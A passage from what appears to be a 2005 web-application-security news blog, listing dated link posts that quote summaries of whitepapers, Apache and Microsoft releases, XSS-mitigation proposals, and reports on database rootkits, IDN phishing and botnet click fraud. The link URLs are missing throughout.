of great value to security professionals, the use of these tools by
attackers represents a clear and present danger to all organisations.
These automated tools have become increasingly popular for attackers seeking
to compromise the integrity of online applications, and are used during most
phases of an attack. Whilst there are a number of defence techniques which,
when incorporated into a web-based application, are capable of stopping even
the latest generation of tools, unfortunately most organisations have failed
to adopt them.
This whitepaper examines techniques which are capable of defending an
application against these tools; providing advice on their particular
strengths and weaknesses and proposing solutions capable of stopping the
next generation of automated attack tools.
"
Article Link:
Link:
|
|
|
|
04/29/2005 XSS Vulnerabilities So understimated so dangerous
|
I just stumbled upon this new XSS article by hackerscenter.
Article Link:
Link:
|
|
|
|
04/18/2005 Apache 2.0.54 Released
|
"The Apache Software Foundation and The Apache HTTP Server Project are
pleased to announce the release of version 2.0.54 of the Apache HTTP
Server ("Apache"). This Announcement notes the significant changes
in 2.0.54 as compared to 2.0.54. The Announcement is also available in
German and Japanese from:
This version of Apache is principally a bug fix release.
This release is compatible with modules compiled for 2.0.42 and
later versions. We consider this release to be the best version of
Apache available and encourage users of all prior versions to
upgrade.
Apache HTTP Server 2.0.54 is available for download from
"
Link:
|
|
|
|
04/07/2005 Database rootkit menace looms
|
"Crackers are developing more sophisticated techniques for take over the control of corporate databases using malicious code akin to malware already common on Unix platforms. The threat also applies to repository-based software such as CRM systems and web applications, creating a need for new security tools, according to Alexander Kombrust of Red Database Security."
"Database rootkits would be implemented by either modifying a database object or changing the execution path, for example by creating a local object with the identical name, establishing a synonym pointing to a different object or switching to a different schema. Thereafter Kornbrust showed how it would be possible for a hacker to hide database users or processes he controlled. Most internal packages from Oracle are protected from modifications but Kombrust emphasised that the threat - although hard to quantify - was real."
- theregister
Link:
UPDATE: 4/8/2005
Alexander Kornbrust the author of the paper above was nice enough to submit a direct link to his paper. Thanks!
Link:
|
|
|
|
04/03/2005 Anti Brute Force Protection
|
An Anonymous user writes "Theres a new paper by Gunter Ollmann at NGS Software which covers a unique
method of helping to protect web-based authentication pages from being successfully bruteforced.
The paper goes into considerable depth about the use of resource metering techniques that are
computationaly intensive at the client-side, but trivial to verify at the server side - thereby
making it difficult (and time consuming) to conduct an automated attack.
The paper is located at "
Link:
|
|
|
|
04/03/2005 The "Script Keys" approach to preventing Cross Site Scripting
|
Yet another XSS prevention idea from Gervase Markham.
"This is the second of my three ideas for the client-side mitigation of Cross-Site Scripting (XSS). It's based on the same principle - that of the site owner specifying which scripts should be permitted and which not - but takes a slightly different approach.
Basically, the idea is that an HTTP header, Script-Key, defines a random string or "key" and only script labelled in some way with that string is allowed to execute. As the string will be different for every page load, injected script would not be correctly labelled and therefore would not be permitted to run." - Gervase
Article Link:
Link:
|
|
|
|
04/02/2005 A Proposal to prevent Cross Site Scripting Attacks
|
"The perfect way to prevent cross-site scripting (XSS) attacks would be for the user agent to read the website designer's mind to determine which scripts embedded in a page were legitimate and which were malicious. In the absence of affordable and reliable mind-reading technology, and in consideration of the mental fatigue this would undoubtedly induce in web page authors, this paper presents a way for a site designer to explain his state of mind to the user agent by specifying restrictions on the capabilities of his content." - gerv
Article Link:
Link:
|
|
|
|
03/23/2005 Millions of Pages Google Hijacked via Open Directory feed
|
"Like many webmasters I was a bit too relaxed about 302 hijacks, until I started digging into who was hijacking my pages and how could I remove them. I have now discovered that this problem is numerically out of control, with millions of 302s out there. And boy, am I angry. If you have a Dmoz link, check for 302s - obviously Google have to have indexed the page thats 302ing you, for it to be a problem. Maybe its my fault for having lots of Dmoz links!" - threadwatch
Article Link:
Link:
|
|
|
|
03/22/2005 Microsoft releases "Security Development Lifecycle" paper
|
Michael Howard sent the following email to the bugtraq mailing list today.
"Microsoft has made publicly available our Security Development Lifecycle
(SDL) paper at
The SDL is the process that Microsoft has implemented for the
development of software that needs to withstand malicious attack. The
process encompasses the addition of a series of security-focused
activities and deliverables to each of the phases of Microsoft's
software development process. These activities and deliverables include
the development of threat models during software design, the use of
static analysis code-scanning tools during implementation, and the
conduct of code reviews and security testing during a focused "security
push". Before software developed under the SDL can be released, it must
undergo a Final Security Review by a team independent from its
development group. When compared to software that has not been subject
to the SDL, software that has undergone the SDL has experienced a
significantly reduced rate of external discovery of security
vulnerabilities. This paper describes the SDL and discusses experience
with its implementation across Microsoft software.
Cheers, Michael"
Article Link:
Link:
|
|
|
|
03/17/2005 New google site shut down by Apple?
|
"Google has unceremoniously, and without comment, yanked its latest labs "project" after less than twenty four hours. In 'Google X' a software engineer had replaced the main text navigation bar on the Google home page with a Mac OS X-style dock. A row of eight icons zoomed and shrank as the mouse hovered over them, the row itself shuffling to make room for the expansion - exactly like Mac OS X's dock." - The Register
I saw this before it went down and it was pretty neat. Hopefully they will bring it back
Article Link:
Link:
|
|
|
|
03/15/2005 Google 302 redirection trick
|
I found an interesting article on google this morning regarding some tricks that you can do
to make your site rank higher on google.
Article Link:
Link:
|
|
|
|
03/13/2005 External Web Application Protection: Impedance Mismatch
|
Ivan from modsecurity had an interesting post about some of the challenges
he faces when developing . Be sure to also check out his "Where Do Web
Application Firewalls Fit in the Overall Defense Strategy?" posting.
"Web application firewalls have a difficult job trying to make sense of data that passes by, without any knowledge of the application and its business logic. The protection they provide comes from having an independent layer of security on the outside. Because data validation is done twice, security can be increased without having to touch the application. In some cases, however, the fact that everything is done twice brings problems. Problems can arise in the areas where the communication protocols are not well specified, or where either the device or the application do things that are not in the specification." - Ivan
Blog Link:
Mod_security Link:
Link:
|
|
|
|
03/08/2005 IIS 6.0 Security
|
"The popularity of web servers as a prime target for crackers and worm writers around the globe made IIS a natural place for Microsoft to focus its Trustworthy Computing Initiative. As a result, IIS has been completely redesigned to be secure by default and secure by design. This article discusses the major default configuration and design changes incorporated in IIS 6.0 to make it a more secure platform for hosting critical web applications" - Rohyt Belani and Michael Muckin
Article:
Link:
|
|
|
|
03/02/2005 Apache 2 with SSL/TLS: Step-by-Step, Part 3
|
"This article concludes our three part series dedicated to configuring Apache 2.0 with SSL/TLS support -- for maximum security and optimal performance of SSL based e-commerce transactions.
Part one introduced key aspects of SSL/TLS and then showed how to compile, install and configure Apache 2.0. The second part discussed the configuration of mod_ssl and authentication issues, and then showed how to create web server's SSL certificate.
Now, in the third and final article, we will take a look at client authentication using client certificates, show how to chroot a secure Apache, discuss common attack vectors, and then describe some typical configuration mistakes made by administrators that will decrease the security level of SSL communications. " - Artus Maj
Link:
Link:
|
|
|
|
02/28/05 The Insecure Indexing Vulnerability Attacks Against Local Search Engines
|
In this article Amit Klein discusses the risks associated with using a local search engine
that indexes its content locally.
Link:
Link:
|
|
|
|
02/24/2005 Ajax: A New Approach to Web Applications
|
"Google Suggest and Google Maps are two examples of a new approach to web applications that we at
Adaptive Path have been calling Ajax. The name is shorthand for Asynchronous JavaScript + XML, and
it represents a fundamental shift in what's possible on the Web." - Jesse James Garrett
Article Link:
Link:
|
|
|
|
02/20/2005 Fiddling with HTTP
|
A co worker emailed me a link to a an interesting Microsoft article about the tool 'Fiddler'.
"Microsoft Fiddler can help you answer these questions, and many more. Fiddler is an HTTP debugging proxy that logs all HTTP traffic between your computer and the Internet. Fiddler enables you to inspect all HTTP traffic, set breakpoints, and "fiddle" with incoming or outgoing data. Fiddler is much simpler to use than NetMon or other network debuggers because it exposes only HTTP traffic and does so in a user-friendly format.
Fiddler includes a simple but powerful Microsoft JScript .NET event-based scripting subsystem flexible enough to support a broad array of HTTP debugging tasks. Written in C# on the Microsoft .NET Framework, Fiddler is available as an unsupported PowerToy for Internet Explorer." - Microsoft
Article Link:
Tool Link:
Download Link:
Link:
|
|
|
|
02/14/2005 Update to the Frequently Asked Questions Page
|
I've updated the FAQ page with a bunch of questions that I get asked fairly often. This is
a work in progress so if there's a question you feel was missed let us know. On another note
happy Valentines Day!
|
|
|
|
02/13/2005 Mod_Python updates released to fix security hole
|
Mod_python 2.7.11 (Apache 1.3) and 3.1.4 (Apache 2.x) have been released to
address a recently discovered .
Updated versions of mod_python
|
|
|
|
02/09/2005 "Mapping Google"
|
I stumbled upon this article today explaining how the new google maps service works.
"By now, many of you will have gone and tried out the new Google Maps application. By and large, you have to admit that it's pretty damned slick for a DHTML web application -- even my wife was impressed, and that's not easy with geek toys. So, in the spirit of Google Suggest and GMail, I've decided to have a quick peek under the hood to figure out what makes it tick."
Link:
|
|
|
|
02/08/2005 Microsoft releases 12 security updates
|
Microsoft has finally released the
it promised in it's last .
Users should beware that some people are
after applying the patches. It should be noted that microsoft *finally* released a *decent patch* (not an ISAPI Filter) for the recent
|
|
|
|
02/08/2005 Apache 2.0.53 released
|
"The Apache Software Foundation and The Apache HTTP Server Project are
pleased to announce the release of version 2.0.53 of the Apache HTTP
Server ("Apache"). This Announcement notes the significant changes
in 2.0.53 as compared to 2.0.52. The Announcement is also available in
German from:
This version of Apache is principally a bug fix release.
This release is compatible with modules compiled for 2.0.42 and
later versions. We consider this release to be the best version of
Apache available and encourage users of all prior versions to
upgrade.
Apache HTTP Server 2.0.53 is available for download from
Please see the CHANGES_2.0 file, linked from the above page, for
a full list of changes." - Apache
Below are snippets from the CHANGELOG
"Changes with Apache 2.0.53
*) SECURITY: CAN-2004-0942 (cve.mitre.org)
Fix for memory consumption DoS in handling of MIME folded request
headers. [Joe Orton]
*) SECURITY: CAN-2004-0885 (cve.mitre.org)
mod_ssl: Fix a bug which allowed an SSLCipherSuite setting to be
bypassed during an SSL renegotiation. PR 31505.
[Hartmut Keil , Joe Orton]"
|
|
|
|
02/08/2005 "New phishing flaw affects all browsers except IE"
|
"jimmy@gmail.com" Reports "A new vulnerability was reported in several web browsers, which
may be exploited by attackers to conduct phishing/spoofing attacks and display fake domain names.
The problem resides in the IDN (International Domain Name) implementation and occurs when handling
malformed URLs containing specially crafted characters, which may be exploited to spoof SSL certificates
and the URL displayed in the address/status bar."
Source:
Link:
|
|
|
|
02/06/2005 Submit news form now available
|
I've found that it's difficult to track every news article, advisory, whitepaper, or press
release alone so I've added a "News Submission Form" to the site. If you have a paper, article
or news story you think is worthwhile please fill out our form and share your resource with
the rest of us!
Link:
|
|
|
|
02/04/2005 Botnets strangle Google Adwords campaigns
|
I found this rather interesting article at the www.theregister.co.uk that was worth posting.
"Security researchers have discovered a way to shut down or seriously impair a Google Adwords advertising campaign by artificially inflating the number of times an ad is displayed. By running searches against particular keywords from compromised hosts, attackers can cause click-through percentage rates to fall through the floor.
This, in turn, causes Google Adwords to automatically disable the affected campaign keywords and prevent ads from being displayed. By disabling campaign keywords using the technique, cybercrimals could give their preferred parties higher ad positions at reduced costs, according to click fraud prevention specialists Clickrisk." - Thereg
Link:
|
|
|
|
02/03/2005 Security Best practice: Host Naming & URL Conventions
|
Gunter Ollmann has written a paper entitled "" .
"A consideration often neglected by many organisation when rolling out new servers or developing web-based applications
that will be accessible by Internet clients and customers is that of host and URL naming conventions. There are
a number of simple steps that can be taken to strengthen the security of an environment of application making it
more resilient to several popular attack vectors. By understanding how an attacker can abuse poorly thought
out naming conventions, and by istigating a few minor changes, it is possible to positively increase
the defense-in-depth stature of an environment" - NGS
Interesting paper worth a read.
|
|
|
|
01/31/2005 Web Application Security Consortium "Guest Article" Released
|
|
|
